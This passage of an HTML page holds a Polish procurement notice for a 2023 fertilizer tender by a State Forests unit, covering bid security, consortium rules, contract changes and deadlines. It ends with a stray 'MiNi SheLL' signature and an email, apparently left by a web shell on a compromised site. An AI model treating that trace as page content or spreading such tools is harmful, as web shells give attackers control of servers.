podstaw do wykluczenia w okolicznościach, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 129 z późn. zm.), W przypadku Wykonawców wspólnie ubiegających się udzielenie zamówienia oświadczenia składa każdy z Wykonawców (załącznik nr 5 do SWZ),<br/><br/>Zamawiający na podstawie art. 274 ust. 1 PZP przed udzieleniem zamówienia wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnego na dzień złożenia oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu złożonym wraz z ofertą w zakresie podstaw wykluczenia wskazanych w SWZ. (wzór stanowi załącznik nr 4 do SWZ) W przypadku Wykonawców wspólnie ubiegających się udzielenie zamówienia oświadczenie to składa każdy z Wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert Wykonawca zobowiązany jest złożyć Zamawiającemu:<br/>1)	Ofertę złożoną od rygorem nieważności, w formie elektronicznej (opatrzoną kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzoną podpisem zaufanym lub podpisem osobistym zawierającą: <br/>a)	formularz Oferty (sporządzony wg wzoru stanowiącego załącznik nr 1 do SWZ), <br/>b)	pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą; pełnomocnictwo powinno być udzielone pod rygorem nieważności, w formie elektronicznej, (opatrzonej kwalifikowanym podpisem elektronicznym) lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym <br/>c)	pełnomocnictwo dla pełnomocnika ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, pełnomocnictwo powinno być udzielone pod rygorem nieważności, w formie elektronicznej, (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym <br/>d) wstępne oświadczenie, sporządzone zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ. pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu składającego oświadczenie, złożone odpowiednio przez:<br/>•	Wykonawcę;<br/>•	Każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>e)	oświadczenie Wykonawcy o braku podstaw do wykluczenia w okolicznościach, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 129), W przypadku Wykonawców wspólnie ubiegających się udzielenie zamówienia oświadczenia składa każdy z Wykonawców (załącznik nr 5 do SWZ),<br/>f) wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia w przypadku wniesienia wadium w formie innej niż pieniężna, <br/>g)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca dostarczy dane umożliwiające dostęp do tych dokumentów, (np. w formie linku w ofercie). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości:<br/>a)	Dla zadania częściowego nr 1: 800 zł<br/>b)	Dla zadania częściowego nr 2: 1 000 zł<br/>c)	Dla zadania częściowego nr 3: 500 zł <br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP. <br/>Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu, <br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity: Dz. U. z 2022 r. poz. 2080 z późn.zm.)<br/>Wadium wpłacane w pieniądzu należy wnieść przelewem na rachunek bankowy Zamawiającego podany w pkt. 1 SWZ z dopiskiem: „Dostawa nawozów w 2023 roku zadanie częściowe nr_____” <br/>Z treści wadium wnoszonego w formie innej niż pieniężna powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>Wadium wnoszone w formie innej niż pieniężna należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo <br/>i nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1 - 5 PZP.<br/>Zamawiający zatrzyma wadium wraz z odsetkami lub wystąpi do gwaranta lub poręczyciela z żądaniem zapłaty wadium w przypadkach określonych w art. 98 ust. 6 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum): <br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>2)	oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3)	oświadczenia, o którym mowa w art. 125 ust. 1 PZP oraz w pkt 10.1 SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>4)	oświadczenie, o którym mowa w pkt 10.2. zobowiązany będzie złożyć każdy <br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji w imieniu każdego, <br/>jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>8)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia <br/>są zobowiązani załączyć do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a)	Zamawiający dopuszcza wprowadzenie zmian części zamówienia, które Wykonawca przewidział do realizacji za pomocą podwykonawców na inne części zamówienia, w tym również na części, których Wykonawca nie wskazał w złożonej przez siebie ofercie. Zmiana nie może pociągnąć za sobą zmiany terminu realizacji ani zwiększenia wynagrodzenia należnego Wykonawcy.<br/>b)	W przypadku zawarcia Umowy z wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia dopuszcza się zmianę członka konsorcjum upoważnionego do wystawiania faktur i do odbioru wynagrodzenia w imieniu wszystkich członków konsorcjum. <br/>c)	Zamawiający dopuszcza możliwość przedłużenia terminu realizacji Przedmiotu Umowy o okres odpowiadający okresowi trwania przeszkody uniemożliwiającej realizację Przedmiotu Umowy jeżeli w trakcie obowiązywania Umowy wystąpią okoliczności uniemożliwiające jej realizację zgodnie z warunkami opisanymi <br/>w Umowie, za które odpowiedzialności nie ponosi Wykonawca ani Zamawiający. <br/>W szczególności dopuszcza się zmianę terminu realizacji przedmiotu umowy spowodowaną:<br/>•	klęskami żywiołowymi, <br/>•	innymi przyczynami zewnętrznymi niezależnymi od Zamawiającego oraz Wykonawcy skutkującymi niemożliwością realizacji dostaw.<br/>d)	Zamawiający dopuszcza wprowadzenie zmian w sposobie wykonywania Przedmiotu Umowy, w przypadku konieczności zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań ze względu na zmiany obowiązującego prawa lub regulacji obowiązujących w Państwowym Gospodarstwie Leśnym Lasy Państwowe;<br/>e)	Zamawiający dopuszcza wprowadzenie zmiany parametrów worków przedstawionych w ofercie pod warunkiem że zmiany te będą korzystne dla Zamawiającego. Będą to, przykładowo zmiany powodujące poprawienie parametrów technicznych, wynikające z postępu technologicznego lub zmiany obowiązujących przepisów. Zmiana nie może wpływać na cenę ustaloną w drodze postępowania o udzielenie zamówienia.<br/>f)	Zamawiający dopuszcza wprowadzenie zmian w przypadku zmiany powszechnie obowiązującego prawa lub wewnętrznych przepisów wpływających na pogorszenie kondycji finansowej Zamawiającego.<br/>g)	Jeśli zmiana stawki podatku VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę, jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma JOSEPHINE</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> ZAMAWIAJĄCY <br/>NIE DOPUSZCZA SKŁADANIA OFERT WARIANTOWYCH <br/> NIE STAWIA WYMAGAŃ W ZAKRESIE ZATRUDNIENIA OSÓB <br/>O KTÓRYCH MOWA W ART. 96 UST 2 PKT 2 PZP<br/> NIE ZASTRZEGA MOŻLIWOŚCI UBIEGANIA SIĘ UDZIELENIE ZAMÓWIENIA WYŁĄCZNIE WYKONAWCÓW O KTÓRYCH MOWA W ART. 94 PZP<br/> NIE PRZEWIDUJE UDZIELANIA ZAMÓWIEŃ O KTÓRYCH MOWA <br/>W ART. 214 UST 1 PKT 8 <br/>NIE PRZEWIDUJE WIZJI LOKALNEJ I SPRAWDZENIA DOKUMENTÓW NIEZBĘDNYCH DO REALIZACJI ZAMÓWIENIA <br/> NIE PRZEWIDUJE ROZLICZANIA W WALUTACH OBCYCH<br/> NIE PRZEWIDUJE ZWROTU KOSZTÓW UDZIAŁU <br/>W POSTĘPOWANIU<br/>NIE ZASTRZEGA KLUCZOWYCH ZADAŃ DO OSOBISTEGO WYKONANIA PRZEZ WYKONAWCĘ<br/> NIE PRZEWIDUJE ZAWARCIA UMOWY RAMOWEJ<br/>NIE PRZEWIDUJE WYBORU NAJKORZYSTNIEJSZEJ OFERTY <br/>Z ZASTOSOWANIEM AUKCJI ELEKTRONICZNEJ<br/> NIE DOPUSZCZA MOŻLIWOŚCI SKŁADANIA OFERT W FORMIE KATALOGÓW ELEKTRONICZNYCH LUB DOŁĄCZENIA KATALOGÓW ELEKTRONICZNYCH<br/>Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% wartości oferty brutto.

Creat By MiNi SheLL
Email: jattceo@gmail.com